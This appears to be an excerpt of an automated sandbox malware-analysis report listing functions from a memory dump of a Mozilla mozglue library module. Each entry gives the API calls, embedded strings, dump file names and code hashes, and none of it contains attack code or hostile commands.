??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C799FDB
free.MOZGLUE(?,?), ref: 6C799FF0
free.MOZGLUE(?,?), ref: 6C79A006
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C79A0BE
free.MOZGLUE(?,?), ref: 6C79A0D5
free.MOZGLUE(?,?), ref: 6C79A0EB

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: 158b7fed40e9964bef500857e711bfed459645d840d3553b527411f0438857ef
Instruction ID: 328bda52d07141719c32ed8e7bdf077d291070fb3660aa82303336b12015a68f
Opcode Fuzzy Hash: 158b7fed40e9964bef500857e711bfed459645d840d3553b527411f0438857ef
Instruction Fuzzy Hash: 5A61D0758097019FC751CF18D58059AB3F5FF88328F548669EC999BB02EB32E986CBC1

Function 6C79DC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C79DC60
AcquireSRWLockExclusive.KERNEL32(?,?,?,6C79D38A,?), ref: 6C79DC6F
free.MOZGLUE(?,?,?,?,?,6C79D38A,?), ref: 6C79DCC1
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C79D38A,?), ref: 6C79DCE9
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C79D38A,?), ref: 6C79DD05
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C79D38A,?), ref: 6C79DD4A

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 1842996449-0
Opcode ID: 4103f1b45b9e71466fc356a8f8c506baf6c2278523be85203e11761332cd87f7
Instruction ID: 25a85c9a7f92c0db1cfffdbc517d250554737787d8f05577dc18b9c6aafee60a
Opcode Fuzzy Hash: 4103f1b45b9e71466fc356a8f8c506baf6c2278523be85203e11761332cd87f7
Instruction Fuzzy Hash: DF419DB5A00206CFCB00CFA9D9849AAB7F9FF89308B154469E905ABB21D771FC10CF90

Function 6C7439A0 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C7CE744,ewzl,00000000,ewzl,?,6C766112), ref: 6C7439AF
LeaveCriticalSection.KERNEL32(6C7CE744,?,6C766112), ref: 6C743A34
EnterCriticalSection.KERNEL32(6C7CE784,6C766112), ref: 6C743A4B
LeaveCriticalSection.KERNEL32(6C7CE784), ref: 6C743A5F

Strings

\|l, xrefs: 6C743A02
ewzl, xrefs: 6C7439A3, 6C7439A5

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: \|l$ewzl
API String ID: 3168844106-2848546200
Opcode ID: 1c6624b5963f30fdd1a79b5c1e6e50241f6d416e45ee6c785f46707364abe4ce
Instruction ID: e0e3b3e80738475bf165b38f0ede40c2471e82ceb44556b61629eb4d59310919
Opcode Fuzzy Hash: 1c6624b5963f30fdd1a79b5c1e6e50241f6d416e45ee6c785f46707364abe4ce
Instruction Fuzzy Hash: A8210732705A078FCB249B76C64A62573B5EB45718B24463DE56983F50D730E9108792

Function 6C78CA20 Relevance: 9.1, APIs: 6, Instructions: 82timesleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000001), ref: 6C78CA57
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C78CA69
Sleep.KERNEL32 ref: 6C78CADD
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C78CAEA
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C78CAF5
?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C78CB19

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Time$Now@SleepStamp@mozilla@@V12@_$BaseDurationFromMilliseconds@PlatformStampTicksUtils@mozilla@@V01@@Value@mozilla@@
String ID:
API String ID: 432163150-0
Opcode ID: 8e1b2a9981a0e827821bca325247438a972d5b311df683967dd6df730ec115fc
Instruction ID: ef952e9a6f3010cace181910ad82b491104a13a0235b99b43ef8d39988ebe8de
Opcode Fuzzy Hash: 8e1b2a9981a0e827821bca325247438a972d5b311df683967dd6df730ec115fc
Instruction Fuzzy Hash: DC215731B006088BC708AF38994946BB7BAFFC6349F408738E945A7681EF7095888782

Function 6C754B30 Relevance: 9.1, APIs: 6, Instructions: 79COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,6C75625D,?,?,?,6C755FDE,?,?,?,?,?,?,?,?,?,00000000), ref: 6C754B5E
CloseHandle.KERNEL32(00000000,?,6C75625D,?,?,?,6C755FDE), ref: 6C754B7B
free.MOZGLUE(00000000,?,6C75625D,?,?,?,6C755FDE), ref: 6C754B88
free.MOZGLUE(?,?,?,6C75625D,?,?,?,6C755FDE), ref: 6C754B9F
free.MOZGLUE(?,00000018,?,?,6C75625D,?,?,?,6C755FDE), ref: 6C754BBC
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000018,?,?,6C75625D,?,?,?,6C755FDE), ref: 6C754BEC

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: free$CloseHandle_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3771103686-0
Opcode ID: c3906e9efc37d8d6fa7ce5446812632b12f514fb54099698dc2c0bf1240c332b
Instruction ID: b45b43dad270ee6a06cedb36bc0d042886f222c43c638375d0f2bb350417bbd1
Opcode Fuzzy Hash: c3906e9efc37d8d6fa7ce5446812632b12f514fb54099698dc2c0bf1240c332b
Instruction Fuzzy Hash: FE11B971A046025BD7108F29EA48B1673B9AF81718FA40638F415CBF81EF31F974E791

Function 6C79C810 Relevance: 9.1, APIs: 6, Instructions: 75COMMON

Download Yara Rule

APIs

??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C79C82D
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C79C842

Part of subcall function 6C79CAF0: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(00000000,00000000,?,6C7BB5EB,00000000), ref: 6C79CB12

?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,00000000), ref: 6C79C863
std::_Facet_Register.LIBCPMT ref: 6C79C875

Part of subcall function 6C77B13D: ??_U@YAPAXI@Z.MOZGLUE(00000008,?,?,6C7BB636,?), ref: 6C77B143

??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C79C89A
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C79C8BC

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Facet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 2745304114-0
Opcode ID: 8d5a48fe6ed0527e33322f83bce437580cf2a7b2fd16be1a99f204bec9205fc1
Instruction ID: 85101981fb2916f9529d875129c6e8015abde86e8d36aec9f845e3af448005fa
Opcode Fuzzy Hash: 8d5a48fe6ed0527e33322f83bce437580cf2a7b2fd16be1a99f204bec9205fc1
Instruction Fuzzy Hash: B5118675B0020A9FCF00DFA5D9998AEBB75FF89355F100139EA0697341DB30AA08CBA1

Function 6C74EB90 Relevance: 9.1, APIs: 6, Instructions: 62COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000104), ref: 6C74EBB5

Part of subcall function 6C75CA10: malloc.MOZGLUE(?), ref: 6C75CA26

memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C77D7F3), ref: 6C74EBC3
GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C77D7F3), ref: 6C74EBD6
free.MOZGLUE(?,?,?,?,?,?,6C77D7F3), ref: 6C74EBF6
free.MOZGLUE(00000000,?,?,?,?,?,?,6C77D7F3), ref: 6C74EC0E

Part of subcall function 6C765E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C765EDB
Part of subcall function 6C765E90: memset.VCRUNTIME140(ewzl,000000E5,?), ref: 6C765F27
Part of subcall function 6C765E90: LeaveCriticalSection.KERNEL32(?), ref: 6C765FB2

GetLastError.KERNEL32(?,?,?,?,?,?,6C77D7F3), ref: 6C74EC1A

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: CriticalSectionfreememset$EnterErrorFileLastLeaveModuleNamemallocmoz_xmalloc
String ID:
API String ID: 2948488910-0
Opcode ID: 7b431e270a95ca1597a557917f4c6077696126af5d29b298f2cef31469740f4d
Instruction ID: f1db50d4911429058f961e944b365bc602704235fdb50029144e22ad97fa8de5
Opcode Fuzzy Hash: 7b431e270a95ca1597a557917f4c6077696126af5d29b298f2cef31469740f4d
Instruction Fuzzy Hash: 9A1140B1A042185BEB00CB78AD4CB9FBAAC9F01729F144434E805DB780E3759D04C7E2

Function 6C79CCF0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 299COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C78DA31,00100000,?,?,00000000,?), ref: 6C79CDA4

Part of subcall function 6C75CA10: malloc.MOZGLUE(?), ref: 6C75CA26

Part of subcall function 6C79D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C79CDBA,00100000,?,00000000,?,6C78DA31,00100000,?,?,00000000,?), ref: 6C79D158
Part of subcall function 6C79D130: InitializeConditionVariable.KERNEL32(00000098,?,6C79CDBA,00100000,?,00000000,?,6C78DA31,00100000,?,?,00000000,?), ref: 6C79D177

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C78DA31,00100000,?,?,00000000,?), ref: 6C79CDC4

Part of subcall function 6C797480: ReleaseSRWLockExclusive.KERNEL32(?,6C791385,?,?,?,?,6C791385,?), ref: 6C7974EB

moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C78DA31,00100000,?,?,00000000,?), ref: 6C79CECC

Part of subcall function 6C75CA10: mozalloc_abort.MOZGLUE(?), ref: 6C75CAA2

Part of subcall function 6C78CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C79CEEA,?,?,?,?,00000000,?,6C78DA31,00100000,?,?,00000000), ref: 6C78CB57
Part of subcall function 6C78CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C78CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C79CEEA,?,?), ref: 6C78CBAF

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C78DA31,00100000,?,?,00000000,?), ref: 6C79D058

Strings

-21-2246122658-369X, xrefs: 6C79CD2C

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
String ID: -21-2246122658-369X
API String ID: 861561044-1259501549
Opcode ID: a3860d130efe068fc27f9b141e3d6f9975ef66fd4d8e6038c36a1a2441173664
Instruction ID: 8b8f2fb83b6544802a011e87c68400ba6f9f56559190af38d4fbcb6b53ed9b1b
Opcode Fuzzy Hash: a3860d130efe068fc27f9b141e3d6f9975ef66fd4d8e6038c36a1a2441173664
Instruction Fuzzy Hash: 03D16D71A04B069FD708CF28D580B99F7E1BF99308F01866DD8598B752EB31A9A5CBC1

Function 6C790180 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 151threadCOMMON

Download Yara Rule

APIs

free.MOZGLUE(?), ref: 6C790270
GetCurrentThreadId.KERNEL32 ref: 6C7902E9
AcquireSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C7902F6
ReleaseSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C79033A

Strings

about:blank, xrefs: 6C79020F

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID: about:blank
API String ID: 2047719359-258612819
Opcode ID: b248ca30b5861a84eaa0072e9de8b8079082301be458126506bd25b30f4129c5
Instruction ID: 0c4fa835b99d3d9639021d43fc4f5a4de1a41ad65490e078bfffce89dd2843e2
Opcode Fuzzy Hash: b248ca30b5861a84eaa0072e9de8b8079082301be458126506bd25b30f4129c5
Instruction Fuzzy Hash: 8651BF71A0021ACFCB00DF58D684AAEB7F5FF4D328F244529D82AA7B41D731BA45CB91

Function 6C78E8B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 144COMMON

Download Yara Rule

Strings

[I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6C78EA9B

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: ExclusiveLockRelease
String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)
API String ID: 1766480654-1136413219
Opcode ID: 9b97f8ccb62572f9e1aecfcb646b65ba863bc6f5b9d586e763192d71fbb453f0
Instruction ID: cf0e62965115e5e8caa4ec4239a5481fe9be491c396d8109c5a659147f60f18d
Opcode Fuzzy Hash: 9b97f8ccb62572f9e1aecfcb646b65ba863bc6f5b9d586e763192d71fbb453f0
Instruction Fuzzy Hash: 3D41F73570120A9FDB009F55C94CBA677B9FB8A718F14003AEA2547B90DB75AA44CBE2

Function 6C78E100 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C78945E
Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789470
Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789482
Part of subcall function 6C789420: __Init_thread_footer.LIBCMT ref: 6C78949F

GetCurrentThreadId.KERNEL32 ref: 6C78E12F
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,6C78E084,00000000), ref: 6C78E137

Part of subcall function 6C7894D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7894EE
Part of subcall function 6C7894D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C789508

?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE ref: 6C78E196
?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE(?,?,?,?,?,?,?,?), ref: 6C78E1E9

Part of subcall function 6C7899A0: GetCurrentThreadId.KERNEL32 ref: 6C7899C1
Part of subcall function 6C7899A0: AcquireSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C7899CE
Part of subcall function 6C7899A0: ReleaseSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C7899F8

Strings

[I %d/%d] WriteProfileToJSONWriter, xrefs: 6C78E13F

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: getenv$?profiler_stream_json_for_this_process@baseprofiler@mozilla@@CurrentExclusiveLockSpliceableThreadWriter@12@$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [I %d/%d] WriteProfileToJSONWriter
API String ID: 2491745604-3904374701
Opcode ID: 88a1009cc173b24d1ae8b713d3ea5a491c31e302a33b470338c8588d0417d6be
Instruction ID: 5c1221c1cdb4cc7092b014bfbb8ced0ffff788510d0ba2331ceff0b2cb01ed17
Opcode Fuzzy Hash: 88a1009cc173b24d1ae8b713d3ea5a491c31e302a33b470338c8588d0417d6be
Instruction Fuzzy Hash: 5E3166B1A017059FC3009F2886083AAFBE1AFE530CF10843DE9895BB41DB70CA09C792

Function 6C77F440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C77F480

Part of subcall function 6C74F100: LoadLibraryW.KERNEL32(shell32,?,6C7BD020), ref: 6C74F122
Part of subcall function 6C74F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C74F132

CloseHandle.KERNEL32(00000000), ref: 6C77F555

Part of subcall function 6C7514B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C751248,6C751248,?), ref: 6C7514C9
Part of subcall function 6C7514B0: memcpy.VCRUNTIME140(?,6C751248,00000000,?,6C751248,?), ref: 6C7514EF

Part of subcall function 6C74EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C74EEE3

CreateFileW.KERNEL32 ref: 6C77F4FD
GetFileInformationByHandle.KERNEL32(00000000), ref: 6C77F523

Strings

\oleacc.dll, xrefs: 6C77F4CB

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
String ID: \oleacc.dll
API String ID: 2595878907-3839883404
Opcode ID: 729d1029e32e86092fee1bca54196a27931ddc96f25b7bc6a4d17def847c843e
Instruction ID: 99cb3cb6580b89b9490cf9c5a3501af622d4f7a6bc91c93a9e8a1c0e076a8748
Opcode Fuzzy Hash: 729d1029e32e86092fee1bca54196a27931ddc96f25b7bc6a4d17def847c843e
Instruction Fuzzy Hash: A541BA306047559FD720DF78CA84BABB7F4AF44318F504A2CF59197650EB70E649CBA2

Function 6C780210 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(?), ref: 6C780222
moz_xmalloc.MOZGLUE(0000000C), ref: 6C780231

Part of subcall function 6C75CA10: malloc.MOZGLUE(?), ref: 6C75CA26

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C78028B
RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 6C7802F7

Strings

@, xrefs: 6C7802D8

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireFreeHeapReleasemallocmoz_xmalloc
String ID: @
API String ID: 2782572024-2766056989
Opcode ID: 98efed8322e3d826732947ba5bfc9dfa00a493632fd3cb28b159dbe276ec8870
Instruction ID: 45d50ef473bb3a258497cefb797c1c9e2997ee7c3665afec8cb25ea312296119
Opcode Fuzzy Hash: 98efed8322e3d826732947ba5bfc9dfa00a493632fd3cb28b159dbe276ec8870
Instruction Fuzzy Hash: A731ABB2A026518FEB54CF58CA80A1AB7E5AF44314B14C53DDA5AEBB41D771EC01CB81

Function 6C78E020 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C78945E
Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789470
Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789482
Part of subcall function 6C789420: __Init_thread_footer.LIBCMT ref: 6C78949F

GetCurrentThreadId.KERNEL32 ref: 6C78E047
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C78E04F

Part of subcall function 6C7894D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7894EE
Part of subcall function 6C7894D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C789508

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C78E09C
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C78E0B0

Strings

[I %d/%d] profiler_get_profile, xrefs: 6C78E057

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: getenv$free$CurrentInit_thread_footerThread__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [I %d/%d] profiler_get_profile
API String ID: 1832963901-4276087706
